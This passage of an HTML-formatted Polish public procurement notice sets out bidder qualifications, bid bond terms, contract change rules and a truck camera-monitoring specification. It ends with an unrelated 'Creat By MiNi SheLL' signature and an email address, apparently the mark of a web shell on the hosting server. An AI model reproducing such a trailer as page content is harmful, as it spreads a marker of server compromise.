class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Nie podlegają wykluczeniu, na podstawie art. 108 ust. 1 ustawy i art. 109 ust. 1 pkt 4, 7, 8, 10 ustawy, z zachowaniem przepisów art. 110 ust. 2 ustawy.<br/>2.	Spełniają warunki udziału w postępowaniu dotyczące:<br/><br/>1)	Zdolności do występowania w obrocie gospodarczym: <br/>Nie dotyczy – Zamawiający nie stawia w ww. punkcie wymagań.<br/><br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Nie dotyczy – Zamawiający nie stawia w ww. punkcie wymagań.<br/><br/>3)	Sytuacji ekonomicznej lub finansowej:<br/>Nie dotyczy – Zamawiający nie stawia w ww. punkcie wymagań.<br/><br/>4)	Zdolności technicznej lub zawodowej:<br/>a)	posiadania wiedzy i doświadczenia:<br/>Wykonawca spełni ww. warunek udziału w postępowaniu, jeżeli wykaże, że w ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty minimum 2 dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia. Jako dostawa odpowiadająca przedmiotowi zamówienia będzie rozumiana dostawa fabrycznie nowego pojazdu (pojazdów) ciężarowego powyżej 3,5 tony o wartości co najmniej 400 000,00 zł brutto każdy pojazd. Dla potwierdzenia prawdziwości danych zawartych w wykazie wykonawca zobowiązany jest załączyć dokumenty potwierdzające należyte wykonanie dostaw. Zamawiający uzna za spełniony ww. warunek SWZ również w przypadku, gdy doświadczenie wykazane przez Wykonawcę obejmować będzie szerszy zakres dostaw niż wymagany przez Zamawiającego, w tym w szczególności wskazywana dostawa/dostawy obejmować będą więcej niż jeden pojazd o wyżej wskazanej specyfikacji.<br/>Uwaga: <br/>Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza, by Wykonawca polegał na doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonał wykazanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie wykonanego zakresu prac oraz przedstawienia stosownych dowodów, np. umowy konsorcjum z której wynika zakres obowiązków bądź wystawionych przez wykonawcę faktur.<br/>b)	dysponowania osobami zdolnymi do wykonania zamówienia (które będą uczestniczyć w wykonaniu zamówienia): <br/>Nie dotyczy – Zamawiający nie stawia w ww. punkcie wymagań<br/>c)	dysponowania odpowiednim potencjałem technicznym:<br/>Nie dotyczy – Zamawiający nie stawia w ww. punkcie wymagań<br/><br/>W stosunku do wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający dopuszcza łączne spełnienie warunku dotyczącego zdolności technicznej lub zawodowej przez wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	W celu potwierdzenia braku podstaw do wykluczenia Zamawiający wymaga złożenia:<br/>1)	Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy Pzp., o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz.U. z 2024r., poz. 594), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi załącznik nr 1.5 do SWZ.<br/>2)	Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami RP:<br/>1)	zamiast Odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej – składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>2)	Dokumenty, o których mowa w pkt 1, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>3)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w tym punkcie, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby lub osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Zapis pkt 2 stosuje się odpowiednio.<br/>4.	Jeżeli Wykonawca podlegałby wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 lub art. 109 ust. 1 pkt 2-5 i 7-10 Pzp (pod warunkiem że niniejsze postępowanie przewiduje takie przesłanki wykluczenia) – może przedłożyć dowody wskazujące na spełnienie przesłanek określonych w art. 110 ust. 2 ustawy Pzp (samooczyszczenie). Udowodnienie spełnienia przesłanek określonych w art. 110 ust. 2 Pzp będzie równoznaczne z brakiem wykluczenia.<br/>5.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków.<br/>6.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający wymaga złożenia wykazu zrealizowanych dostaw wraz z dowodami potwierdzającymi ich należyte wykonanie, zgodnie z wzorem wykazu stanowiącym zał. nr 1.3 do SWZ, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych. Zgodnie z art. 7 pkt 20 Pzp jako przedmiotowe środki dowodowe należy rozumieć środki służące potwierdzeniu zgodności oferowanych dostaw, usług lub robót budowlanych z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub opisie kryteriów oceny ofert, lub wymaganiami związanymi z realizacją zamówienia.<br/><br/>W przedmiotowym postępowaniu przedmiotowym środkiem dowodowym będzie oświadczenie Wykonawcy wskazujące/potwierdzające dane techniczne oferowanego przedmiotu zamówienia, celem dokonania oceny zgodności zaoferowanego świadczenia z opisem technicznym przedmiotu zamówienia. Oświadczenie Wykonawcy składane będzie poprzez uzupełnienie i złożenie formularza Opis techniczny oferowanego sprzętu, stanowiącego załącznik nr 1.7 do SWZ. Wypełniony druk „Opis techniczny oferowanego sprzętu” Wykonawca składa wraz z ofertą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowy środek dowodowy wg zał. nr 1.7 do swz <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> wg swz <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Przystępujący do przetargu zobowiązany jest do złożenia wadium w wysokości: 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100), <br/>2.	Wadium musi obejmować pełen okres związania ofertą.<br/>3.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w ING Banku Śląskim S.A., nr rachunku: 78 1050 1100 1000 0090 3086 1554 - z dopiskiem POSTĘPOWANIE NR 03/PZ/2025<br/>5.	Kopię polecenia przelewu lub wydruk z przelewu elektronicznego zaleca się złożyć wraz z ofertą.<br/>6.	Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>7.	Wadium wnoszone w poręczeniach lub gwarancjach etc. (tj. w formie niepieniężnej) należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>1)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym <br/>w gwarancji lub poręczeniu musi być nazwa i adres zamawiającego<br/>2)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>3)	kwotę gwarancji/poręczenia,<br/>4)	termin ważności gwarancji/poręczenia,<br/>5)	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>8.	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>9.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>10.	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego (np. konsorcjum, spółka cywilna, itp.). W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2.	Zamawiający nie wymaga od Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego występowania w określonej formie prawnej w celu złożenia oferty.<br/>3.	Przepisy ustawy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4.	Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego oświadczenie Wykonawcy, o którym mowa w pkt 6.2 ust. 1 SWZ (wg zał. nr 1.8), jako potwierdzające niepodleganie wykluczeniu, składa zatem oddzielnie każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy, zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i wykona elementy przedmiotu zamówienia, do których realizacji te uprawnienia są wymagane.<br/>6.	W odniesieniu do warunków dotyczących niezbędnego wykształcenia, kwalifikacji zawodowych, doświadczenia, o ile zostały sformułowane w odniesieniu do zdolności technicznej lub zawodowej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają elementy przedmiotu zamówienia, do realizacji których te zdolności są wymagane. W takim przypadku dopuszczalne jest łączne spełnienie ww. warunków przez Wykonawców.<br/>7.	W przypadkach, o których mowa wyżej w ust. 5 i 6, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które elementy przedmiotu zamówienia wykonają poszczególni wykonawcy (wg zał. nr 1.1). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian treści zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy (zmiana danych teleadresowych, zmiana osób do kontaktu, zmiana konta bankowego itp.).<br/>Zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy jest dopuszczalna wyłącznie w drodze obustronnie podpisanego pisemnego aneksu i tylko w przypadku zaistnienia następujących okoliczności:<br/>1)	zmiana urzędowej stawki podatku VAT: zmiana stawki VAT w trakcie trwania umowy leasingu upoważnia wykonawcę do zmiany treści umowy o uwzględnienie nowej stawki podatku VAT w ewentualnych nieuregulowanych płatnościach;<br/>2)	zmiana terminu przewidzianego na realizację dostawy w przypadku wstrzymania dostawy z uwagi na potrzeby Zamawiającego (np. w przypadku pozyskania zewnętrznego finansowania lub przedłużających się procedur uzyskania finansowania zewnetrznego) – nie dłużej jednak niż o 4 tygodnie;<br/>3)	zmiana zaoferowanego sprzętu, komponentu, urządzenia lub innego rozwiązania technologicznego na sprzęt/urządzenie/komponent/rozwiązanie o parametrach tożsamych lub lepszych od przyjętych w ofercie, w przypadku wycofania z rynku dotychczas oferowanych rozwiązań. Wymagane jest oświadczenie producenta potwierdzające parametry i właściwości rozwiązań zastępczych i bezwzględna uprzednia zgoda Zamawiającego; w niniejszym przypadku – w przypadku wypełnienia wszystkich powyższych przesłanek – dopuszczalna jest zmiana ceny;<br/>4)	zmiana zaoferowanego sprzętu, komponentu, urządzenia lub innego rozwiązania technologicznego na sprzęt/urządzenie/komponent/rozwiązanie o parametrach tożsamych lub lepszych od przyjętych w ofercie w przypadku gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy. Wymagane jest oświadczenie wykonawcy uzasadniające zastosowanie rozwiązań zastępczych, dokumenty potwierdzające parametry i właściwości rozwiązań zastępczych jako tożsame lub lepsze niż przyjęte w ofercie oraz uprzednia zgoda Zamawiającego. Zmiana postanowień umowy jeśli chodzi o niniejszą podstawę nie może skutkować zmianą ceny ofertowej;<br/>5)	zmiana przepisów prawa, w tym przepisów prawa miejscowego, mających wpływ na wykonanie przedmiotu umowy. W szczególności dotyczy to przypadków, w których obowiązujące lub zmieniające się przepisy wprowadzają zmiany jeśli chodzi o wymogi techniczne stawiane pojazdom przeznaczonym do utrzymania czystości i porządku w gminach;<br/>6)	wykonawcę, któremu zamawiający udzielił zamówienia, zastępuje nowy wykonawca w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy;<br/>7)	zamawiający przejmuje zobowiązania wykonawcy względem jego podwykonawców, co ex lege oznacza zmianę podmiotowości wykonawcy;<br/>8)	zmiana nie jest istotna w rozumieniu art. 454 uPzp;<br/>9)	wystąpiły okoliczności, których strony umowy nie były w stanie przewidzieć w chwili zawarcia umowy, nawet mimo zachowania należytej staranności, gdy zmiany te są korzystne dla Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-18 07:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a9af8842-1a8f-47b4-8bc2-a68c0ae6e65e</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-18 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z uwagi na limit znaków w ogłoszeniu c.d. OPZ:<br/><br/>11)	System monitoringu wizyjnego zapewniający pole widzenia 360˚ wokół pojazdu, włącznie ze strefami tzw. martwego pola (obszarami wokół pojazdu niewidocznymi dla kierowcy podczas manewrowania): <br/>a)	System monitoringu wizyjnego składa się z 4 zewnętrznych kamer ultra szerokokątnych (min. 185 x 145 stopni) zamontowanych z przodu, po bokach i z tyłu pojazdu do widoku 360 stopni z „lotu ptaka”, kamery wewnętrznej skierowanej w kierunku jazdy pojazdu (w przód) do odczytu przebiegu trasy oraz znaków drogowych, oraz kamery wewnętrznej do monitorowania zdarzeń w kabinie pojazdu (z możliwością nagrywania dźwięku i reflektorem diod podczerwieni – widok nocny), rejestratora do nagrywania materiału video z kamer oraz panelu/wyświetlacza montowanego w kabinie kierowcy (celem podglądu obrazu z kamer w czasie rzeczywistym),<br/>b)	System monitoringu zamontowany na pojeździe winien być kompatybilny z globalnym systemem monitoringu funkcjonującym u Zamawiającego, między innymi powinien zapewniać możliwość podglądu obrazu z kamer zamontowanych na pojeździe na żywo zarówno na wyświetlaczu w kabinie kierowcy, jak i „zdalnie” przez użytkowników systemu globalnego z dedykowanym dostępem do zainstalowanej na dowolnym urządzeniu systemowym aplikacji lub panelu dostępowego z hasłem logowania, dostępnym na dowolnym komputerze lub urządzeniu mobilnym z możliwością obsługi globalnego systemu monitoringu (w technologii 4G oraz WiFi); jednocześnie konfiguracja urządzeń systemowych zamontowanych na pojeździe winna umożliwiać dzielenie wyświetlonego obrazu na panelu wyświetlającym, np. poprzez jednoczesne wyświetlenie widoków z dwóch kamer lub obrazu z dowolnej kamery i widoku z lotu ptaka.<br/>c)	Rejestrator montowany w pojeździe winien być dedykowany do automitive przez co rozumie się: (tablet)<br/>-	posiadanie pamięci wewnętrznej, umożliwiającej zapis i przechowanie danych video z kamer (dysk HDD min. 1TB + karta SD min. 64 GB) <br/>-	działanie z zasilania z instalacji pojazdu ciężarowego w zakr. 9-32V,<br/>-	posiadanie odporności na wibracje: 1G oraz odporności na uderzenia: 51G,<br/>-	posiadanie Atestu EMC : E, Zgodność z RoHS2, Oznaczony CE, <br/>-	posiadanie funkcji automatycznego podgrzewania dysku, aby rejestrator mógł poprawnie pracować w niskich temperaturach - zakres pracy -40ºC do +70ºC.<br/>d)	Konfiguracja zamontowanych na pojeździe komponentów systemowych winna umożliwiać wygenerowanie tzw. alarmów z podłączonych wejść cyfrowych, przy czym jako „alarm” będzie traktowany sygnał czujnika lub zdarzenie; rejestracja „alarmu” (wystąpienie określonego zdarzenia) winna być oznaczona w materiale video zarejestrowanym przez kamery, aby możliwe było natychmiastowe przesunięcie zapisu video z dowolnej kamery do momentu wystąpienia alarmu. Wymagane jest min. 8 wejść cyfrowych do rejestracji alarmów (rodzaje zdarzeń oznaczonych jako alarmy winny być konfigurowalne przez Zamawiającego jako użytkownika). <br/>Komunikacja urządzeń na pojeździe z globalnym systemem monitoringu musi zapewniać implementację aktualnej cyfrowej mapy Polski oraz zapewniać możliwość określenia pozycji nagranego materiału na tej mapie (np. poprzez wbudowany nadajnik GPS).<br/><br/>Wykonawca zapewni udzielenie rękojmi oraz pełnej gwarancji jakości i rękojmi na cały przedmiot zamówienia (tj. podwozie oraz zabudowę) na okres min. 24 miesięcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com